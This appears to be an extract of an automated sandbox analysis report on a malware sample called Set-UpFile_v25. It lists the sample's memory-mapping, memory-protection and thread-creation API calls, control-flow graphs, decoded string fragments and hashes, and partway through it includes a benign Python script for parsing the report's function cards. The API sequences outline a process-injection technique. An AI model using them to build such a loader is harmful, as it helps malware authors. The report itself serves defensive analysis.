• NtMapViewOfSection.NTDLL(?,00000000), ref: 029D2E76
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 029D31EA
• NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 029D329F
• VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 029D32BC
• VirtualProtect.KERNEL32(?,?,?,00000000), ref: 029D335F
• VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 029D3392
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 029D3503
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: Virtual$ProtectSection$CreateView$AllocThread
• String ID:
• API String ID: 1248616170-0
• Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction ID: c0fa53418bd3ae435cdb7dc361bf85a55e8315b7a3c22874ea57dbe990de311a
• Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction Fuzzy Hash: 6942AB71608341AFDB24CF28C884B6BBBE9EF88705F44896DF9899B241D730E944DF56

Control-flow Graph
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,029805CB,?,00000001,?,81EC8B55,000000FF), ref: 02980AC3
• Thread32First.KERNEL32(00000000,0000001C), ref: 02980AEF
• Wow64SuspendThread.KERNEL32(00000000), ref: 02980B42
• CloseHandle.KERNEL32(00000000), ref: 02980B6C
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
• String ID:
• API String ID: 1849706056-0
• Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction ID: f8ebec751fe0c48026dcd68206b0b4e296fd86f8ad148cdedab083881d618d5d
• Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction Fuzzy Hash: F0410C71A00108AFDB18DF98C890FADB7B6EF88304F14816CE6159B7A4DB34EE45CB54

Control-flow Graph
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02980618
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0298090C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: CreateProcessTerminateThread
• String ID: <54
• API String ID: 1197810419-2608504192
• Opcode ID: 6cd1d1d1636f1908863831fc612a57462820193ffb17512ecce75b997a9b2fcd
• Instruction ID: 012e463125cc074469724305fc3152b43fc98732484d7264d9591b33d9da1b52
• Opcode Fuzzy Hash: 6cd1d1d1636f1908863831fc612a57462820193ffb17512ecce75b997a9b2fcd
• Instruction Fuzzy Hash: 7012CFB4E00219DFDB14DF98C990BADBBB2FF88304F2482A9D515AB385C735AA45CF54

Control-flow Graph
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02980A01
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
• Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction ID: c07eeefa49101a5d74a5b4a1cef08956efb0d4550e32826d324ac6cd1f9e45a7
• Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction Fuzzy Hash: DC41E274A00209EFDB14DF98C994BAEBBB1FF88304F248598D515AB381C771AE85CF94

Control-flow Graph
APIs
• LoadLibraryA.KERNEL32(00000000,?,?), ref: 029D3A45
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: .dll
• API String ID: 1029625771-2738580789
• Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction ID: bb7f3a2f184a43676be774521707b25255cacda861bd582b4086b84788b70486
• Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction Fuzzy Hash: 03210332700285DFEB21DFADD844B6ABBA8AF01725F0881ADDC458BA41D730E845DF85

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 307 29d2605-29d2669 call 29d3bac * 3 314 29d266b-29d266d 307->314 315 29d2693 307->315 314->315 317 29d266f-29d2671 314->317 316 29d2696-29d26a0 315->316 317->315 318 29d2673-29d2685 VirtualAlloc 317->318 319 29d2687-29d268e 318->319 320 29d26a1-29d26c4 call 29d4021 call 29d4045 318->320 319->315 321 29d2690 319->321 326 29d270e-29d2727 call 29d3bac 320->326 327 29d26c6-29d26fc call 29d3d19 call 29d3bef 320->327 321->315 326->315 332 29d272d 326->332 336 29d295d-29d2966 327->336 337 29d2702-29d2708 327->337 334 29d2733-29d2739 332->334 338 29d273b-29d2741 334->338 339 29d2775-29d277e 334->339 340 29d296d-29d2975 336->340 341 29d2968-29d296b 336->341 337->326 337->336 342 29d2743-29d2746 338->342 343 29d27d7-29d27e2 339->343 344 29d2780-29d2786 339->344 346 29d29a4 340->346 347 29d2977-29d29a2 call 29d4045 340->347 341->340 341->346 350 29d2748-29d274d 342->350 351 29d275a-29d275c 342->351 348 29d27fb-29d27fe 343->348 349 29d27e4-29d27ed call 29d18f9 343->349 345 29d278a-29d27a5 call 29d3bac 344->345 367 29d27c4-29d27d5 345->367 368 29d27a7-29d27af 345->368 354 29d29a8-29d29c8 call 29d4045 VirtualFree 346->354 347->354 358 29d2959 348->358 359 29d2804-29d280d 348->359 349->358 370 29d27f3-29d27f9 349->370 350->351 356 29d274f-29d2758 350->356 351->339 357 29d275e-29d276c call 29d39b3 351->357 379 29d29ce-29d29d0 354->379 380 29d29ca 354->380 356->342 356->351 371 29d2771-29d2773 357->371 358->336 365 29d280f 359->365 366 29d2813-29d281a 359->366 365->366 372 29d281c-29d2825 call 29d1795 366->372 373 29d284a-29d284e 366->373 367->343 367->345 368->358 375 29d27b5-29d27be 368->375 370->366 371->334 384 29d2827-29d282d 372->384 385 29d2833-29d283c call 29d1890 372->385 377 29d2854-29d2876 373->377 378 29d28f0-29d28f3 373->378 375->358 375->367 377->358 393 29d287c-29d288f call 29d4021 377->393 
382 29d2945-29d2947 call 29d2d35 378->382 383 29d28f5-29d28f8 378->383 379->316 380->379 392 29d294c-29d294d 382->392 383->382 386 29d28fa-29d28fd 383->386 384->358 384->385 385->373 400 29d283e-29d2844 385->400 390 29d28ff-29d2901 386->390 391 29d2916-29d2927 call 29d23f6 386->391 390->391 396 29d2903-29d2906 390->396 405 29d2929-29d2935 call 29d29d5 391->405 406 29d2938-29d2943 call 29d1ec2 391->406 397 29d294e-29d2955 392->397 408 29d2891-29d2895 393->408 409 29d28b3-29d28ec 393->409 401 29d290d-29d2914 call 29d35a3 396->401 402 29d2908-29d290b 396->402 397->358 403 29d2957 397->403 400->358 400->373 401->392 402->397 402->401 403->403 405->406 406->392 408->409 413 29d2897-29d289a 408->413 409->358 419 29d28ee 409->419 413->378 414 29d289c-29d28b1 call 29d3e24 413->414 414->419 419->378
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 029D267F
• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 029D29C3
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction ID: 2874facc72592c79434197e24d24c34c402819ce4ac61f9768d5b03ed20d119e
• Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction Fuzzy Hash: 7BB1E131A00B02ABDB219FA0CD80BB7B7ADFF49314F108929ED9996152D731E551EFA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ $"$#$$$%$'$'$)$.$/$0$0$1$3$4$4$5$6$6$6$9$9$;$;$;$=$?$?$B$B$B$C$F$I$I$J$N$P$R$T$T$V$V$[$]$^$^$_$e$k$k$k$m$o$r$s$u${$|$}
• API String ID: 0-2842158168
• Opcode ID: f16beb53404ff305d301fe2e17bf908e41086b851ee9555c847a5ffe03b2a07b
• Instruction ID: f43b8971c1a0c90c2d1278d35d75d167c07150797ba072eea600acda40aa1825
• Opcode Fuzzy Hash: f16beb53404ff305d301fe2e17bf908e41086b851ee9555c847a5ffe03b2a07b
• Instruction Fuzzy Hash: 87B28F3160C7C18BC3359A3C88643AEBBD1ABD6324F184A6DE4E98B3D2D7759845C793

Control-flow Graph (graph image not included in this extract)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$1$2$9$>$N$T$]$l${
• API String ID: 0-2785627941
• Opcode ID: 29be1ab724cc37f2a935c0d872581649a90bce668f56bf9511a07da9f2d5447f
• Instruction ID: 4847c509d17e0f88f25342ebe153743847d10f09678a8861b3f1ee8b22671b95
• Opcode Fuzzy Hash: 29be1ab724cc37f2a935c0d872581649a90bce668f56bf9511a07da9f2d5447f
• Instruction Fuzzy Hash: F4629F72A0C7808BDB249F3C88943AEBBD6ABC5324F194E7ED4E9873C1D67585458B06

Control-flow Graph (graph image not included in this extract)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: '$($0$C$C$T$Z$h$x
• API String ID: 0-3884181529
• Opcode ID: 8edd2ca0f0b3a5a5022e85e3e912420404d46cfab8ccbbe3701cf475f3fdaf82
• Instruction ID: 41a02727460419861052daa51a67955ebe8e3e890c3aaf8ccce4f84c14ea8d81
• Opcode Fuzzy Hash: 8edd2ca0f0b3a5a5022e85e3e912420404d46cfab8ccbbe3701cf475f3fdaf82
• Instruction Fuzzy Hash: FE22BF7260D7808BD724AF38C4943AEBBE6ABC5324F194E6ED4D987381DA748905CB47

Control-flow Graph (graph image not included in this extract)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$($)$,$5$7$p$q$w
• API String ID: 0-1769235293
• Opcode ID: 0e194027626a9452c8d75cee691d622472ab34534f316d22095298861fa9516e
• Instruction ID: edb9b87fd769d848648fd79e01922cb443bffa3f365bdcd372c9a0f951cbaad3
• Opcode Fuzzy Hash: 0e194027626a9452c8d75cee691d622472ab34534f316d22095298861fa9516e
• Instruction Fuzzy Hash: 3E12BB7160C3908FD3248F28C4A536EBBE1ABD5314F198E6EE4D987391D7B98845CB86

Control-flow Graph (graph image not included in this extract)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: x~$()$*LMB$=hn$FgsQ$gD?z$gd$t"j
• API String ID: 0-2687496081
• Opcode ID: 1163f18ff1ef8d99059eadc189b0277bd35e59365f1577b9463e0776543c12d5
• Instruction ID: 4b5bc8d42332d227a8e44da869c39c49cb01cb886608cbd4da0adfd20b875306
• Opcode Fuzzy Hash: 1163f18ff1ef8d99059eadc189b0277bd35e59365f1577b9463e0776543c12d5
• Instruction Fuzzy Hash: 705202766083418BD314CF29C9917ABBBE6EFC5314F198A2CE5D58B390DB78D805CB92

Control-flow Graph (function at 0x298b2c2: 28 basic blocks spanning 0x298b2c2-0x298b761, 10 single-block loops, exit block 0x298b755-0x298b761; calls 0x2987972, 0x2989b02, 0x298ab12 (four call sites), 0x298add2, 0x298e112, 0x2989b12)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: !$115;$115;$5$?<$?i?$Mi?$_
• API String ID: 0-2532054263
• Opcode ID: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
• Instruction ID: 177120897e944fa1b5e33820c60f95995efbfb63c494b9913df8a7297d5b136f
• Opcode Fuzzy Hash: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
• Instruction Fuzzy Hash: 21B1BDB11483408BE714DF25D861B6BBBE6EFC2328F188D1DE0D18B391D779850ACB56
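The function cards in this report are a flat text dump: a control-flow edge list ("<node id> <start>-<end>", optional "call <addr>" markers, "src->dst" edges) followed by "• Key: Value" bullets. As an added example (not Joe Sandbox's code; the layout it parses is inferred from the cards on this page and is an assumption, not a documented format), the Python below turns one card into structured data: entry and exit blocks, address span, single-block loops, unreachable blocks and the ordered list of call targets, plus the Opcode ID and the `$`-separated String ID list. The embedded sample is the edge list and metadata of the function at 0x298b2c2, copied from this report.

```python
"""Parse Joe Sandbox function cards (CFG edge list + metadata bullets).

Added example, not Joe Sandbox's code; the text layout handled here is
inferred from this report and is an assumption, not a documented format.
"""
from collections import defaultdict, deque

# Constructed sample, copied from this report: the function at 0x298b2c2.
SAMPLE_CFG = (
    "control_flow_graph 1315 298b2c2-298b2d0 1316 298b695-298b697 1315->1316 1317 298b2d6-298b353 "
    "call 2987972 call 2989b02 1315->1317 1319 298b755-298b761 1316->1319 1323 298b362-298b376 "
    "1317->1323 1323->1323 1324 298b378-298b3a4 call 298ab12 1323->1324 1327 298b3b2-298b3c6 "
    "1324->1327 1327->1327 1328 298b3c8-298b3f8 call 298ab12 1327->1328 1331 298b402-298b42b "
    "1328->1331 1331->1331 1332 298b42d-298b464 call 298ab12 1331->1332 1335 298b472-298b4a9 "
    "1332->1335 1335->1335 1336 298b4ab-298b4c4 1335->1336 1337 298b4d2-298b4e6 1336->1337 "
    "1337->1337 1338 298b4e8-298b50a call 298ab12 1337->1338 1341 298b512-298b533 1338->1341 "
    "1341->1341 1342 298b535-298b605 call 298add2 1341->1342 1345 298b612-298b634 1342->1345 "
    "1345->1345 1346 298b636-298b63e 1345->1346 1347 298b640-298b648 1346->1347 1348 298b663-298b66e "
    "1346->1348 1349 298b652-298b661 1347->1349 1350 298b69c 1348->1350 1351 298b670-298b677 "
    "1348->1351 1349->1348 1349->1349 1353 298b6a0-298b6ed 1350->1353 1352 298b682-298b691 "
    "1351->1352 1352->1352 1354 298b693 1352->1354 1355 298b6f2-298b718 1353->1355 1354->1353 "
    "1355->1355 1356 298b71a-298b74b call 298e112 call 2989b12 1355->1356 1356->1319"
)

SAMPLE_CARD = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Similarity
• API ID:
• String ID: !$115;$115;$5$?<$?i?$Mi?$_
• API String ID: 0-2532054263
• Opcode ID: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
• Instruction ID: 177120897e944fa1b5e33820c60f95995efbfb63c494b9913df8a7297d5b136f
• Opcode Fuzzy Hash: 0a96278d3c8a363abbaabbe458023a2e8b3dc6ee13424f45437c937beb2a2224
• Instruction Fuzzy Hash: 21B1BDB11483408BE714DF25D861B6BBBE6EFC2328F188D1DE0D18B391D779850ACB56
"""


def parse_cfg(text):
    """Return (nodes, edges): nodes maps id -> (start, end, [call targets]),
    edges is a list of (src, dst). Addresses are ints."""
    tokens = text.split()
    nodes, edges = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                  # edge "src->dst"
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens):
            # node "<id> <start>[-<end>]" followed by zero or more "call <addr>"
            rng = tokens[i + 1].split("-")
            start, end = int(rng[0], 16), int(rng[-1], 16)
            i += 2
            calls = []
            while i + 1 < len(tokens) and tokens[i] == "call":
                calls.append(int(tokens[i + 1], 16))
                i += 2
            nodes[int(tok)] = (start, end, calls)
        else:
            i += 1                     # header word or orphan fragment of a truncated dump
    return nodes, edges


def parse_card(text):
    """Turn the '• Key: Value' bullets into a dict; String ID is split on '$',
    the separator the report uses between strings (a heuristic: a literal '$'
    inside a string is not distinguishable here)."""
    card = {}
    for line in text.splitlines():
        key, sep, value = line.strip().lstrip("•").strip().partition(":")
        if sep:
            card[key.strip()] = value.strip()
    if "String ID" in card:
        card["strings"] = [s for s in card["String ID"].split("$") if s]
    return card


def summarize(nodes, edges):
    """Entry/exit blocks, address span, single-block loops, unreachable blocks
    and the ordered, de-duplicated call targets of one function."""
    succ, pred = defaultdict(set), defaultdict(set)
    for s, d in edges:
        succ[s].add(d)
        pred[d].add(s)
    entries = [n for n in nodes if not pred[n]]
    entry = entries[0] if entries else next(iter(nodes))
    seen, queue = {entry}, deque([entry])      # BFS from the entry block
    while queue:
        for d in succ[queue.popleft()]:
            if d in nodes and d not in seen:
                seen.add(d)
                queue.append(d)
    calls = []
    for n in sorted(nodes, key=lambda k: nodes[k][0]):
        for target in nodes[n][2]:
            if target not in calls:
                calls.append(target)
    return {
        "entry": nodes[entry][0],
        "lo": min(s for s, _, _ in nodes.values()),
        "hi": max(e for _, e, _ in nodes.values()),
        "blocks": len(nodes),
        "exits": sorted(nodes[n][0] for n in nodes if not succ[n]),
        "self_loops": sorted(nodes[s][0] for s, d in edges if s == d and s in nodes),
        "unreachable": sorted(nodes[n][0] for n in nodes if n not in seen),
        "calls": calls,
    }


if __name__ == "__main__":
    print(summarize(*parse_cfg(SAMPLE_CFG)))
    print(parse_card(SAMPLE_CARD))
```

For the sample function the summary gives entry 0x298b2c2, a single exit block at 0x298b755, ten single-block loops (the tight loops typical of inline string-decoding routines) and the call sequence 0x2987972, 0x2989b02, 0x298ab12, 0x298add2, 0x298e112, 0x2989b12. Across the cards on this page the Opcode ID equals the Opcode Fuzzy Hash, so that field is the natural key for matching a function against other reports of the same family; the Instruction Fuzzy Hash is the looser, near-match key.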

Control-flow Graph (function at 0x29bcbc2: 42 basic blocks spanning 0x29bcbc2-0x29bcff6, 6 single-block loops, exit block 0x29bcfe7-0x29bcff6; no calls)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$@$J$P$X$X$s$~
• API String ID: 0-3380057976
• Opcode ID: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
• Instruction ID: 501eddcfd185468209bf05375f13034fbbad3ee4d4934714ff058d42ac14fdcf
• Opcode Fuzzy Hash: c6b4e446e3944338f3872d734502533133df34c924da4037aa6ccfb615a18edb
• Instruction Fuzzy Hash: 57C1E272A0C7D04ED325867C884839BAFD25FD2224F1D8FAEE5E9C73D2D66988058353
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: $8ZY$@DFF$I@HS$NGKL$Q$T@AK
• API String ID: 0-2870219239
• Opcode ID: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
• Instruction ID: 837186e94363c02d622265abf1f8fa1fdf7c77b5fdc2ad6730841f379c4eabdd
• Opcode Fuzzy Hash: 0b0e415eee66c380f386ae008601ad8518172b9752a036fcdfb6c9fa8950056b
• Instruction Fuzzy Hash: 03D1E57250C3A18BD325DF29C86035BFFE1AF92608F0D896DE8D18B345D779850ACB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: % 0($/u]7$A$NN$jq${
• API String ID: 0-2405101777
• Opcode ID: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
• Instruction ID: 243d46b36721770c0e0f7caea1e0e213a213258cd8114a58c7098d6878d7a19f
• Opcode Fuzzy Hash: 506fb22a02b729bb397a2ab486950d006a4132dd3afe1e2583815c450ee2fe6a
• Instruction Fuzzy Hash: 0C71DF7010C3828BD711DF2984507ABFFE1AF97244F1899AEE4D5DB242DB78C50AC726
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: !I/K$+E-G$23,$7U0W$hi$vMnO
• API String ID: 0-280941541
• Opcode ID: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
• Instruction ID: 011842bf7193c890b400115dae1ad76c3b516d8e8da6a73201f2dc1f1e935638
• Opcode Fuzzy Hash: b310955efd1bbe41752e6671e77fd99e906004300efec5c75b3d6a38c503ff1e
• Instruction Fuzzy Hash: 1941EF742093919BD7189F28C86177BB7E2FF86304F08992CE5C69B2D1E7748901CB4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$)$IDAT$IEND$IHDR
• API String ID: 0-3469842109
• Opcode ID: f9d5927079dbe5952970529c093a2cac2a039b0e73578539b20dca946c01c9b4
• Instruction ID: 82eb7b328bee54d7c42ab577e572bf04a8464628d3ac2cf26d657d9a1ca756c4
• Opcode Fuzzy Hash: f9d5927079dbe5952970529c093a2cac2a039b0e73578539b20dca946c01c9b4
• Instruction Fuzzy Hash: A00224B16083908FD714EF68C89076ABBE1FFD5304F4A852DE9858B391D379D908CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: (HyN$5D"J$8@(F$_$cPQV
• API String ID: 0-882278378
• Opcode ID: 1da3d1bc773617987d346d6c30645742576db1c4423b3220aa4f462191f88acd
• Instruction ID: 698176d4a2b785aa0604e8a7154ebd6ffc4debd802a13ca160a8426a8aae7b4e
• Opcode Fuzzy Hash: 1da3d1bc773617987d346d6c30645742576db1c4423b3220aa4f462191f88acd
• Instruction Fuzzy Hash: 956129152146904AEB6CDF74889373BBAE6DF85308F1891BFC895CF697E538C5038B49
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: 52#0$S"(w$S"(w$f
• API String ID: 0-4029711564
• Opcode ID: ac7f2cd36c1052b6b89d37aacbe0b1ed5b07f493e73f73d69f12a8dfc485f2be
• Instruction ID: efb987beb6ee3478dee9baf270585de7b5726980a71eb60c9c71dd5db6568d86
• Opcode Fuzzy Hash: ac7f2cd36c1052b6b89d37aacbe0b1ed5b07f493e73f73d69f12a8dfc485f2be
• Instruction Fuzzy Hash: AB22D2716083418FD724CF18C89076ABBE5FBC4318F298A2DE4E947392D775E805CB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: !$4C|]$9G9A$No)i
• API String ID: 0-363387783
• Opcode ID: 99ef643c84b66f015dcbb3ba373007805ac151789093f39ec11bcd0cddd0432f
• Instruction ID: 76308ad50ef65418819a9881a39d8a6014f0c4938df6cabbce965b70ccc6f19e
• Opcode Fuzzy Hash: 99ef643c84b66f015dcbb3ba373007805ac151789093f39ec11bcd0cddd0432f
• Instruction Fuzzy Hash: 0D81BAB5E452089FDF10CF95E8817EEBB72EF55310F14802DE9846B241D73E490ADBA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
Yara matches
Similarity
• API ID:
• String ID: 1>?<$t$$-
• API String ID: 0-1214471300
• Opcode ID: eaf7fef8290ca267fd93b6873740f89e17e051e220a84919e0a7861d9221380e
• Instruction ID: 687d07ac901228f7e26d33eeabb5f3238b0346bb0bcfab141e076e1c27be5f5b
• Opcode Fuzzy Hash: eaf7fef8290ca267fd93b6873740f89e17e051e220a84919e0a7861d9221380e
                                                                                                                                                                • Instruction Fuzzy Hash: CDE1C4B16093408BD714CF68C8A1B6BBBE5FFC5314F14992DE5858B391E7B8D805CB92
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ;$A$YqMC
                                                                                                                                                                • API String ID: 0-1057406701
                                                                                                                                                                • Opcode ID: 1d1c454c0a6ce5b526db7e6ab724aae148abac9ac88063eff11794e4b055225e
                                                                                                                                                                • Instruction ID: 7f85e4786c477189eebdad2ccd0dc3b6302106e24896709f0bbcf9711b6fb915
                                                                                                                                                                • Opcode Fuzzy Hash: 1d1c454c0a6ce5b526db7e6ab724aae148abac9ac88063eff11794e4b055225e
                                                                                                                                                                • Instruction Fuzzy Hash: F4D1E27150C3508BD328EF6894903ABFBE5AFC2704F08892EE9D56B341D775990ACB97
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_2980000_Set-UpFile_v25.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !.$I"M $^2^0
                                                                                                                                                                • API String ID: 0-3146913702
                                                                                                                                                                • Opcode ID: 8ea121c802999dbd66e6baa778c838c71ddd33164dc1e7cefb047b327b046430
                                                                                                                                                                • Instruction ID: 03554a5e368ffd503da6dac2345cd7bd30e5d310c571380f8f6e6d0f974edc39
